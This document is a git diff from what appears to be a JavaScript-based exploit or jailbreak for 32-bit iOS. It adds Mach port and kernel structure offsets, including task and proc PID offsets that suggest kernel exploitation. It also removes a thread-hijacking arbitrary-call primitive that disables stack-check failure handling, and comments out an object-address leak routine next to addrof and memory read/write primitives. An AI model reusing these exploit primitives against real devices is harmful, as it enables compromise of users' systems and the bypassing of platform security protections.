diff options
| -rw-r--r-- | src/js/main.js | 36 | ||||
| -rw-r--r-- | src/js/primitives/call.js | 94 | ||||
| -rw-r--r-- | src/js/primitives/mem.js | 3 |
3 files changed, 36 insertions, 97 deletions
diff --git a/src/js/main.js b/src/js/main.js index e077fbe..ec7e814 100644 --- a/src/js/main.js +++ b/src/js/main.js @@ -18,6 +18,9 @@ var PROT_EXEC = 0x4; var MAP_PRIVATE = 0x2; var MAP_ANON = 0x1000; +var RTLD_NOW = 2; +var PAGE_SIZE = 0x1000; +var O_RDONLY = 0; var victim = {a: 13.37}; @@ -33,7 +36,7 @@ if (0) { */ puts = function (){}; -} + } } var JSStringCreateWithUTF8CString = 0x239f9d0d; @@ -47,6 +50,35 @@ var kCFPreferencesCurrentHost; var kIOMasterPortDefault = NULL; var options = {}; +var sanity_port = 0; +var MACH_PORT_RIGHT_RECEIVE = 0x1; +var MACH_MSG_TYPE_MAKE_SEND = 0x14; +var MACH_PORT_LIMITS_INFO = 0x1; +var MACH_PORT_LIMITS_INFO_COUNT = 0x1; +var kport_size = 0x78; +var kport_ip_bits4 = 0x0; +var kport_ip_references4 = 0x4; +var kport_ip_lock_type4 = 0x10; +var kport_ip_messages_port_qlimit2 = 0x42; +var kport_ip_receiver4 = 0x4c; +var kport_ip_srights4 = 0x70; +var KERN_SUCCESS = 0; +var NULL = 0; +var MACH_PORT_NULL = 0; +var req_init_port_set = 0x1c; +var req_head_msgh_bits = 0x0; +var req_head_msgh_request_port = 0x8; +var req_head_msgh_reply_port = 0xc; +var req_head_msgh_id = 0x14; +var req_msgh_body_msgh_descriptor_count = 0x18; +var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2; +var req_init_port_set_address = 0x0; +var req_init_port_set_count = 0x4; +var MACH_RCV_MSG = 0x2; +var MACH_MSG_TIMEOUT_NONE = 0; +var TASK_BSDINFO_OFFSET = 0x200; +var BSDINFO_PID_OFFSET = 0x8; + function parse_nvram_options() { // read_u32(dlsym(dlopen("/System/Library/Frameworks/IOKit.framework/IOKit", RTLD_NOW), "kIOMasterPortDefault")); var kIOMasterPortDefault_ptr = shit_heap(4) @@ -98,7 +130,7 @@ function main() { sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide; sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide; - prep_shit(); +// prep_shit(); setup_fancy_rw(); diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js index a581c91..74a20d8 100644 --- a/src/js/primitives/call.js +++ b/src/js/primitives/call.js @@ -158,100 +158,6 @@ function symaddr(sym) { return addy; } -function callnarg_new() { - if (arguments.length < 1) { - return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length); - } - - var stack_shit = 0x161000; - - /* - * setup ptrs - */ - write_u32(countptr, count); - write_u32(thptr, th); - write_u32(threadptr, thread); - write_u32(thread_stateptr, thread_state); - - write_u32(countptrptr, countptr); - write_u32(thptrptr, thptr); - write_u32(threadptrptr, threadptr); - write_u32(thread_stateptrptr, thread_stateptr); - - var addy = arguments[0]; - var dyld_shc_slide = get_dyld_shc_slide(); - - /* - * make __stack_chk_fail infinite loop - * (works by setting its lazy addy to its resolver, thus the resolver just - * endlessly jumps to iself) - */ - write_u32(__stack_chk_fail_lazy_addy + dyld_shc_slide, __stack_chk_fail_resolver + dyld_shc_slide); - - /* - * if the thread doesn't exist, create it. - */ - calls4arg("pthread_create", threadptr, 0, __stack_chk_fail_resolver + dyld_shc_slide, 0); - thread = read_u32(threadptr); - write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0)); - rth = read_u32(th); - calls4arg("thread_suspend", rth, 0, 0, 0); - - if (pthread_ret == 0) { - pthread_ret = malloc(4); - } - - /* - * write first 4 to r0-r3, rest to stack - */ - for (var i = 1; i < arguments.length; i++) { - if (i <= 4) { - write_u32(thread_state + ((i - 1) << 2), arguments[i]); - } else { - write_u32(stack_shit + ((i - 5) << 2), arguments[i]); - } - } - - var stack_shit_ret_offset = 0x58; - - write_u32(stack_shit + stack_shit_ret_offset, pthread_exit + dyld_shc_slide); - - /* - * stack - */ - write_u32(thread_state + (13 << 2), stack_shit); - - /* - * return address, infinite loop - */ - write_u32(thread_state + (14 << 2), add_sp_0x3c + dyld_shc_slide); - - /* - * pc - */ - write_u32(thread_state + (15 << 2), addy); - - /* - * cpsr, magic - */ - if (addy & 1) { - write_u32(thread_state + (16 << 2), 0x40000020); - } else { - write_u32(thread_state + (16 << 2), 0x40000000); - } - - /* - * set the state - */ - calls4arg("thread_set_state", rth, ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT); - calls4arg("thread_resume", rth, 0, 0, 0); - - calls4arg("pthread_join", thread, pthread_ret, 0, 0); - write_u32(count, 17); - calls4arg("thread_get_state", rth, ARM_THREAD_STATE, thread_state, count); - return read_u32(pthread_ret); -} - function callnarg() { if (arguments.length < 1) { return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length); diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js index 0c03090..d664e7b 100644 --- a/src/js/primitives/mem.js +++ b/src/js/primitives/mem.js @@ -308,12 +308,13 @@ var jsobj_addr; var large_buf = new Uint32Array(0x100000); var large_buf_ptr = 0; +/* function prep_shit() { string_ref = scall("JSStringCreateWithUTF8CString", "victim"); global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44)); jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL); large_buf_ptr = leak_vec(large_buf); -} +}*/ function addrof(obj) { victim.target = obj; |